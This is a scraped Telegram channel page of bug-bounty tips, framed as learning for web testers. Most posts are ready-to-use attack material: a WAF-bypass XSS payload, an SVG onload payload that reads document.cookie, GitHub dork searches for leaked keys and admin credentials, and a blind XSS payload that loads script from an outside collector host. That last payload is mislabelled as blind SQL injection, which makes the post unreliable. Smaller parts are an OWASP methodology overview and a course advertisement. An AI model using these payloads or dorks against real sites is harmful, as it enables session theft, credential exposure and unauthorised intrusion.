Available now! Telegram Research 2025 β the year's key insights 
Bug bounty Tips
Open in Telegram
π‘οΈ Cybersecurity enthusiast | π» Helping secure the digital world | π Web App Tester | π΅οΈββοΈ OSINT Specialist Admin: @laazy_hack3r
Show more5 855
Subscribers
+624 hours
+707 days
+36030 days
Posts Archive
5 855
A payload to bypass WAF, published by @akaclandestine
<detalhes%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
5 855
## Payload :-
https://help[.]something[.]com/?search=%22%3E%3Csvg%2Fonload=confirm(document.cookie)%3E
## Tips :-
nuclei -l live-subs.txt -t /root/nuclei-templates/http/vulnerabilities/generic/t top-xss-params.yaml
5 855
Find lot of bugs using this dorks in github
"Target.com" language:yml
"Target. com" language:yml "_key"
"Target. com" language:yml "admin"
"Target. com" language:yml "root"
"Target. com" language:yml "host
5 855
Bug: Blind SQli
Payload:
';"/></textarea></script><script/src=//xss.report/c/username></script>
Inject your payload in these forms.
Submit Feedback
Contacts us
Join Our Waitlist
Customer Support
check if email field type="text" <input type="text" name="email"> then inject payload in Email field
5 855
\u0022: Represents a double quote (").
\u003c: Represents a less-than sign (<).
%26quot;: Represents the HTML entity for a double quote (").
%26gt;: Represents the HTML entity for a greater-than sign (>).
%26lt;: Represents the HTML entity for a less-than sign (<).
';}};β>
${{7*7}}: Contains JavaScript code designed to execute when the payload is injected and the page is loaded. The code includes closing the current script tag (), injecting an image tag with an onerror attribute that triggers an alert, and then a simple arithmetic expression ${{7*7}} that evaluates to 49.
5 855
π₯First Step Toward Web Application Testing : π
We will always come across various web applications that are designed and configured differently. One of the most current and widely used methods for testing web applications is the https://github.com/OWASP/wstg/tree/master/document/4-Web_Application_Security_Testing. βοΈ
One of the most common procedures is to start by reviewing a web application's front end components, such as HTML, CSS and JavaScript (also known as the front end trinity), and attempt to find vulnerabilities such as Sensitive Data Exposure { https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure } and Cross-Site Scripting (XSS) { https://owasp.org/www-project-top-ten/2017/A7_2017-Cross-Site_Scripting_(XSS) } . π
Once all front end components are thoroughly tested, we would typically review the web application's core functionality and the interaction between the browser and the webserver to enumerate the technologies the webserver uses and look for exploitable flaws. We typically assess web applications from both an unauthenticated and authenticated perspective (if the application has login functionality) to maximize coverage and review every possible attack scenario. β¨
5 855
How to Submit Vulnerabilities, Writing a Great WriteUp and 2 years of Bug Bounty
https://blog.intigriti.com/2023/11/22/bug-bytes-217-how-to-submit-vulnerabilities-writing-a-great-writeup-and-2-years-of-bug-bounty/
5 855
Hello guys, i hope everyone is doing well. today i am here to announce a biggest launch from cipherops till now, we are introducing a certification course name "OWPT" i.e offensive web pen testing. we have some offers going on with the registration link i will post the broucher here, anyone intrested please do register and if anyone looking for the course please do share it others also, as the training batch starts from DEC 1st , register soon. https://forms.gle/PgrQ2jA84iDLTkfA9
